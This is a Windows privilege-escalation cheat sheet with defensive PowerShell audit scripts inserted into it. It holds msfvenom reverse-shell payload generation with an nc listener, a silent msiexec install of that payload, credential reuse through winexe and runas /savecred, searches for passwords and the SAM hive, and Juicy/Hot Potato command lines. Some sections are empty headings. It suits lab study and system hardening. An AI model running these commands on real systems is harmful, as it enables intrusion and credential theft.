
Windows


Last updated 7 months ago

  1. Check the current user (whoami) and its groups (net user <username>).

  2. Run winPEAS with the fast, searchfast, and cmd options.

  3. Run Seatbelt and other scripts as well (PowerUp.ps1, SharpUp, etc.).

  4. If your scripts are failing and you don't know why, you can always run the manual commands from this page and from other Windows PrivEsc cheatsheets.

Strategy:

Spend some time reading over the results of your enumeration.

If winPEAS or another tool finds something interesting, make a note of it.

Avoid rabbit holes by creating a checklist of the things you need for the privilege escalation method to work.

Have a quick look around for files on the user's desktop and in other common locations (e.g. C:\ and C:\Program Files). Read through any interesting files you find, as they may contain information that helps escalate privileges.

Have a good look at processes running as administrator, enumerate their versions and search for exploits.

Check for internal ports that you might be able to forward to your attacking machine.

Try things that don't have many steps first:

  • registry exploits, services, etc.

If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with, or even a username.

At this stage you can also start to think about kernel exploits.

Registry Exploits

Requirements for success:
  • AutoRuns --> .\winPEASany.exe quiet applicationinfo

    • search for Autorun Applications (T1010)

    • check FilePerms: Everyone

    • ability to restart the machine

  • AlwaysInstallElevated

    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated must be set to 1.

    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated must be set to 1.

AutoRuns

Replace Program.exe with reverseShell.exe, then restart the computer so that the application runs in the

Manual check:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# check the permissions on the directory holding the autorun binary

.\accesschk.exe /accepteula -wvu "<directory>"

AlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi

# listener on the attacking machine: nc -lvnp 53

Execute the reverse shell:

msiexec /quiet /qn /i reverse.msi
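The two registry checks above (AutoRuns and AlwaysInstallElevated), done from the defender's side as an added example that is not part of the original notes: a PowerShell audit that reads both AlwaysInstallElevated values and reports them together with the fix, and lists Run-key executables whose file or parent directory is writable by broad groups (the condition winPEAS reports as FilePerms: Everyone). It assumes Windows PowerShell 5.1 or later and an administrator session; the function names are my own.

```powershell
# Added audit example (not from the original notes). Assumes PowerShell 5.1+
# on Windows; run as an administrator so every Run-key target can be inspected.

function Test-AlwaysInstallElevated {
    # The policy only takes effect when BOTH values are 1; report each so that
    # a half-set policy is visible too.
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $values = foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; Value = $v }
    }
    [pscustomobject]@{
        Values     = $values
        Vulnerable = (@($values | Where-Object { $_.Value -eq 1 }).Count -eq 2)
        Fix        = 'Set both AlwaysInstallElevated values to 0 (or delete them) and enforce it by GPO: ' +
                     'Administrative Templates > Windows Components > Windows Installer > ' +
                     '"Always install with elevated privileges" = Disabled (Computer and User Configuration)'
    }
}

function Get-WeakRunKeyBinary {
    # Enumerates Run-key entries and reports those whose executable, or the
    # directory it lives in, grants Write/Modify/FullControl to broad principals.
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    )
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata (PSPath, PSDrive, ...)
            # Extract the executable: a quoted path, or the first token before a space.
            $cmd = [string]$p.Value
            if ($cmd -match '^"([^"]+)"') { $exe = $Matches[1] } else { $exe = ($cmd -split ' ')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)
            if ([string]::IsNullOrWhiteSpace($exe)) { continue }
            foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
                if ([string]::IsNullOrWhiteSpace($target)) { continue }
                if (-not (Test-Path -LiteralPath $target)) { continue }
                $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
                if (-not $acl) { continue }
                foreach ($ace in $acl.Access) {
                    if ($ace.AccessControlType -ne 'Allow') { continue }
                    if ($broad -notcontains $ace.IdentityReference.Value) { continue }
                    $rights = $ace.FileSystemRights.ToString()
                    if ($rights -match 'FullControl|Modify|Write') {
                        [pscustomobject]@{
                            RunKey    = $key
                            Entry     = $p.Name
                            Path      = $target
                            Principal = $ace.IdentityReference.Value
                            Rights    = $rights
                        }
                    }
                }
            }
        }
    }
}

Test-AlwaysInstallElevated | Format-List
Get-WeakRunKeyBinary | Format-Table -AutoSize
```

Any row returned by Get-WeakRunKeyBinary is a binary that a low-privileged user could replace before the next reboot; the fix is to tighten the ACL on the file and its directory (remove the broad write grant) or move the program under a protected path. Both checks are also cheap to schedule as a periodic compliance script.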

Service Exploits

Requirements for success:

Passwords

Requirements for success:

.\winPEASany.exe quiet filesinfo userinfo -> search for AutoLogon credentials (T1012)

Log in as another user on Windows:

winexe -U 'admin%password123' //<target ip address> cmd.exe

# run as NT AUTHORITY\SYSTEM
winexe -U 'admin%password123' --system //<target ip address> cmd.exe

SaveCred

cmdkey /list

# exploit: run a program with the saved credentials
runas /savecred /user:admin C:\Windows\Tasks\rev.exe

Password in Configuration

.\winPEASany.exe quiet cmd searchfast filesinfo

search for --> possible known files that can contain creds (T1083 & T1081)

or use these cmd commands to find the creds:

dir /s *pass* == *.config

findstr /si password *.xml *.ini *.txt

SAM/SYSTEM Locations

File locations:

dir c:\windows\system32\config

dir c:\windows\repair

dir c:\windows\system32\config\regback

or use winPEAS:

.\winPEASany.exe quiet cmd searchfast filesinfo

search for --> possible known files that can contain creds (T1083 & T1081)

Copy the SAM and SYSTEM files to Kali Linux.
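The Password in Configuration and SAM/SYSTEM Locations checks above, turned into a defender's audit as an added example that is not part of the original notes: one function reports whether the hives at the three listed locations are readable by ordinary users, the other finds configuration files (the same *.xml, *.ini, *.txt and *.config types as the findstr search) that contain credential-looking keywords, reporting file and line but not the secret itself. It assumes Windows PowerShell 5.1 or later and an administrator session; function names and the default scan root are my own.

```powershell
# Added audit example (not from the original notes). Assumes PowerShell 5.1+
# on Windows; run as an administrator so that ACLs on protected files can be read.

function Get-HiveBackupExposure {
    # Locations named in the notes. The live hives are locked but their ACLs can
    # still be inspected; copies under repair\ and RegBack\ are the usual leak.
    $hives = foreach ($dir in @("$env:SystemRoot\System32\config",
                                "$env:SystemRoot\repair",
                                "$env:SystemRoot\System32\config\RegBack")) {
        foreach ($name in 'SAM', 'SYSTEM') { Join-Path $dir $name }
    }
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    foreach ($path in $hives) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $item = Get-Item -LiteralPath $path -Force
        $acl  = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
        if (-not $acl) {
            [pscustomobject]@{ Path = $path; SizeBytes = $item.Length; BroadReaders = '(acl unreadable)'; Exposed = $null }
            continue
        }
        $readers = @($acl.Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and
                           $broad -contains $_.IdentityReference.Value -and
                           $_.FileSystemRights.ToString() -match 'Read|FullControl' } |
            ForEach-Object { $_.IdentityReference.Value })
        [pscustomobject]@{
            Path         = $path
            SizeBytes    = $item.Length   # a 0-byte RegBack copy is harmless; a populated one is not
            BroadReaders = ($readers -join ', ')
            Exposed      = [bool]$readers
        }
    }
}

function Find-CredentialKeyword {
    param(
        [string]$Root = 'C:\inetpub',                                  # assumed default, adjust per host
        [string[]]$Include = @('*.xml', '*.ini', '*.txt', '*.config'),
        [int]$MaxFileMB = 5                                            # skip large logs and data files
    )
    # Same spirit as the notes' findstr search, widened to common key names.
    # Only the matched keyword is returned so that no secret ends up in a report.
    $pattern = 'password|passwd|pwd|connectionstring'
    Get-ChildItem -Path $Root -Include $Include -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le ($MaxFileMB * 1MB) } |
        Select-String -Pattern $pattern -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Keyword = $_.Matches[0].Value
            }
        }
}

Get-HiveBackupExposure | Format-Table -AutoSize
Find-CredentialKeyword | Format-Table -AutoSize
```

A hive row with Exposed set to true (or a readable copy in repair\) means any local user can take the hashes offline; remove the stale copy or restore the default ACL. For the keyword hits, review each file and move the secret into a protected store or at least restrict the file's ACL to the service account that needs it.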

Scheduled Tasks

Requirements for success:

Insecure GUI Apps

Requirements for success:

Startup Apps

Requirements for success:

Installed Apps

Requirements for success:

Hot Potato

Requirements for success:

Windows 7, 8, 10, Server 2008, Server 2012

.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

Juicy Potato

Requirements for success:
  • usually a service account

  • whoami /priv -> SeImpersonatePrivilege Enabled

# -l COM server listen port, -p program to launch, -t CreateProcess call (* = try both), -c CLSID
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>
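The precondition the notes give for the Potato family is a token holding SeImpersonatePrivilege. As an added example that is not part of the original notes, the PowerShell below audits that from the defender's side: it exports the local user-rights assignment with secedit, resolves the SIDs that hold the privilege, and lists services running under custom (non built-in) accounts so that unnecessary grants can be reviewed. It assumes Windows PowerShell 5.1 or later and an administrator session (secedit requires one); the function names are my own.

```powershell
# Added audit example (not from the original notes). Assumes PowerShell 5.1+
# on Windows and an administrator session.

function Get-PrivilegeHolder {
    param([string]$Privilege = 'SeImpersonatePrivilege')
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    try {
        # secedit writes the local policy as an .inf; under [Privilege Rights]
        # each user right is listed as  Name = *SID,*SID,...  (a leading * marks a SID).
        secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $line = Get-Content -LiteralPath $cfg -ErrorAction SilentlyContinue |
            Where-Object { $_ -match ('^' + [regex]::Escape($Privilege) + '\s*=') } |
            Select-Object -First 1
        if (-not $line) { return }
        foreach ($entry in (($line -split '=', 2)[1] -split ',')) {
            $raw = $entry.Trim()
            if (-not $raw) { continue }
            if ($raw.StartsWith('*')) {
                $sid = New-Object System.Security.Principal.SecurityIdentifier($raw.Substring(1))
                try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $name = '(unresolved)' }
                [pscustomobject]@{ Sid = $sid.Value; Account = $name }
            } else {
                [pscustomobject]@{ Sid = $null; Account = $raw }   # entry already given as a name
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -Force -ErrorAction SilentlyContinue
    }
}

function Get-ServiceCustomAccount {
    # Services not running as one of the built-in service identities. HoldsPriv
    # compares the account's leaf name against the holders list; it does not
    # expand group membership, so treat it as a starting point for review.
    $builtin = 'LocalSystem', 'NT AUTHORITY\LocalService', 'NT AUTHORITY\NetworkService'
    $holders = @(Get-PrivilegeHolder | ForEach-Object { ($_.Account -split '\\')[-1].ToLowerInvariant() })
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -and $builtin -notcontains $_.StartName } |
        ForEach-Object {
            $leaf = ($_.StartName -split '\\')[-1].ToLowerInvariant()
            [pscustomobject]@{
                Service   = $_.Name
                Account   = $_.StartName
                State     = $_.State
                HoldsPriv = ($holders -contains $leaf)
            }
        }
}

Get-PrivilegeHolder | Format-Table -AutoSize
Get-ServiceCustomAccount | Format-Table -AutoSize
```

Two caveats when reading the output. First, the default grant covers Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE, and every service process carries the SERVICE SID, which is why the notes say "usually a service account"; the per-account rows therefore matter most for accounts that are not services at all (interactive users or scheduled-task identities). Second, the lasting mitigation is to keep services that must run under custom accounts from also exposing an attacker-reachable process (web applications, database engines), since that process is what gets the token abused.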

Port Forwarding

Requirements for success:

Kernel Exploits

Requirements for success:

For Juicy Potato, make sure the CLSID is the right one. If stuck, check these out -->

https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release
https://github.com/ohpe/juicy-potato
https://jlajara.gitlab.io/Potatoes_Windows_Privesc
https://www.youtube.com/watch?v=CW4mI5BkP9E&t=7090s
Windows - Privilege Escalation - Internal All The Things